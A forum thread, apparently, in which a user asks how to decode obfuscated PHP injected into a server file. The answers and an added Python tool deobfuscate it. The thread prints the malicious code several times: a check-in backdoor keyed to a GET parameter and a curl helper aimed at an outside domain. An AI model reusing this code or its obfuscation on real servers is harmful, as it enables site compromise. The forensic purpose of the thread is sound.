
How to deobfuscate a PHP code that is written as below?

I have seen this code added to a server file. It looks like malicious code, and I can't seem to find a way to deobfuscate/decrypt it.

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

Because I always wonder what to expect if this happened to me, I looked up what this code does.

First the commented code, and below the comments only.

DO NOT execute this on your machine!

// Sets header ...
@header('Content-Type:text/html;charset=utf-8');
// Disables error reporting (sure to not trigger notifications on owner side).
error_reporting(0);
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
//                                                                             ^ escaped by me
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
// Sets $O global (makes no sense to me).
global $O;
// decodes the url encoded string "qwertyuiopasdf...".
$O=urldecode($OOOOOO);
// $_GET['chen'] == '51-cn'
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    // Load this file into var.
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    // Explode by "<?php" (makes no sense to me).
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    // If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
        // then echo "[ok!]" and exit
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        // else echo "[fail!]" and exit
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

// The following function is not called by the provided code.
// I think it's there to load more code into the project.
// (I disabled the curl lines, by the way.)

// Set sub domain on var.
$oOooOO='z0807_1';
// Set url "http://z0807_1.agoods.top" on var.
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    // Init curl.
    #$ooooOOOooOo=curl_init();
    // Set url (given function param).
    #curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
    // CURLOPT_RETURNTRANSFER = 1 to not echo out response.
    #curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
    // 5 sec connection timeout.
    #curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
    // Execute and set response to NEW var.
    #$oooooOOOOooO = curl_exec($ooooOOOooOo);
    #curl_close($ooooOOOooOo);
    // Return new var content.
    #return $oooooOOOOooO;
}

Here is the "just comments" part.

// Sets header ...
// Disables error reporting (sure to not trigger notifications on owner side).
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// Sets $O global (makes no sense to me).
// decodes the url encoded string "qwertyuiopasdf...".
// $_GET['chen'] == '51-cn'
    // Load this file into var.
    // Explode by "<?php" (makes no sense to me).
    // If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
        // then echo "[ok!]" and exit
        // else echo "[fail!]" and exit

// The following function is not called by the provided code.
// I think it's there to load more code into the project.
// (I disabled the curl lines, by the way.)

// Set sub domain on var.
// Set url "http://z0807_1.agoods.top" on var.
    // Init curl.
    // Set url (given function param).
    // CURLOPT_RETURNTRANSFER = 1 to not echo out response.
    // 5 sec connection timeout.
    // Execute and set response to NEW var.
    // Return new var content.

So this looks to me like

  • not the complete code that got injected
  • something done by a bot that checks whether the injection was successful
  • a script to load more bad code into your project on demand.

Let's hope you just got "marked" somewhere as "found" - so nothing really happened yet.
But I don't know that.

You can unravel this step by step.

There is this $OOOOOO string, which is then URL-decoded into $O, yielding the following (which looks like someone going through the keyboard row by row):

$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";

From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these $O{x} bits with the actual characters (I used a regex replace):


if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

We can then combine those strings to make them more readable:


if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

Now let's rename the confusing variables:


if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}

Next, let's split up the long line inside of the function:

if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);
    curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
    $varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}
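The substitution both answers perform by hand (URL-decode the alphabet, inline every $O{n} lookup, then merge the adjacent string literals) can be automated, which matters when the same dropper appears in dozens of files during clean-up. The script below is an added example and is not code from either answer; it embeds the relevant lines of the script from the question as a constructed sample. It generalizes the manual regex replace slightly: it handles any number of urldecode()'d lookup tables, both the deprecated $O{n} and the $O[n] index syntax, and PHP's single-quote escaping rules, and it merges literals on a token stream so that a quote inside one literal can never pair up with the quote of a neighbouring one.

```python
"""Static deobfuscation of the PHP "$O{n}" character-lookup trick (added example)."""
import re
from urllib.parse import unquote

# Constructed sample input: the relevant lines of the obfuscated script quoted in the
# question (the $OOOOOO literal and the $O{n} expressions are copied from it verbatim).
SAMPLE = r'''$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}
$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
'''

# $NAME="%xx%xx...";  (a purely %-encoded double-quoted literal)
ENCODED_RE = re.compile(r'\$(\w+)\s*=\s*"((?:%[0-9a-fA-F]{2})+)"\s*;')
# $TARGET=urldecode($SOURCE);
URLDECODE_RE = re.compile(r'\$(\w+)\s*=\s*urldecode\(\s*\$(\w+)\s*\)\s*;')
# $NAME{n} (pre-PHP-8 brace offset syntax) or $NAME[n]
INDEX_RE = re.compile(r'\$(\w+)[{\[](\d+)[}\]]')
# Tokenizer: single-quoted literal | double-quoted literal | whitespace | any other char.
# PHP comments are not recognised, so strip them first if a sample contains quotes in comments.
TOKEN_RE = re.compile(r"'(?:[^'\\]|\\.)*'" r'|"(?:[^"\\]|\\.)*"' r"|\s+|.", re.S)


def decode_alphabets(src):
    """Map each variable that can be indexed as a lookup table to its character string:
    the raw %-encoded literal under its own name, and the urldecode()'d text under the
    name of the variable that receives it."""
    alphabets = dict(ENCODED_RE.findall(src))
    for target, source in URLDECODE_RE.findall(src):
        if source in alphabets:
            alphabets[target] = unquote(alphabets[source])
    return alphabets


def php_single_quoted(text):
    """Render text as a PHP single-quoted literal; only backslash and ' are escaped there."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def inline_char_lookups(src, alphabets):
    """Replace every $NAME{n} / $NAME[n] whose table is known with the literal character."""
    def repl(m):
        table = alphabets.get(m.group(1))
        idx = int(m.group(2))
        if table is None or idx >= len(table):
            return m.group(0)  # unknown variable or out-of-range index: leave untouched
        return php_single_quoted(table[idx])
    return INDEX_RE.sub(repl, src)


def merge_concats(src):
    """Collapse runs of 'a'.'b' into 'ab', tolerating whitespace around the dot."""
    tokens = TOKEN_RE.findall(src)
    is_sq = lambda t: len(t) >= 2 and t[0] == "'" and t[-1] == "'"
    out, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if is_sq(tok):
            j = i + 1
            while j < len(tokens) and tokens[j].isspace():
                j += 1
            if j < len(tokens) and tokens[j] == ".":
                k = j + 1
                while k < len(tokens) and tokens[k].isspace():
                    k += 1
                if k < len(tokens) and is_sq(tokens[k]):
                    # Fold this literal into the next one and continue scanning from there,
                    # so a chain of any length collapses in a single pass.
                    tokens[k] = "'" + tok[1:-1] + tokens[k][1:-1] + "'"
                    i = k
                    continue
        out.append(tok)
        i += 1
    return "".join(out)


def deobfuscate(src):
    """Full pipeline: recover lookup tables, inline the lookups, merge the literals."""
    return merge_concats(inline_char_lookups(src, decode_alphabets(src)))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Running it prints the same readable form the answer reached by hand ($_GET['chen']=='51-cn', explode('<?php', ...), the '[ok!]' / '[fail!]' markers and the 'http://'.$oOooOO.'.agoods.top' URL), without executing any of the sample. The script deliberately performs only textual rewriting: it never evaluates the PHP, so it is safe to run over suspect files when triaging a compromised host, and the decoded URL and GET parameter it exposes are exactly the indicators worth searching for in web server access logs.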
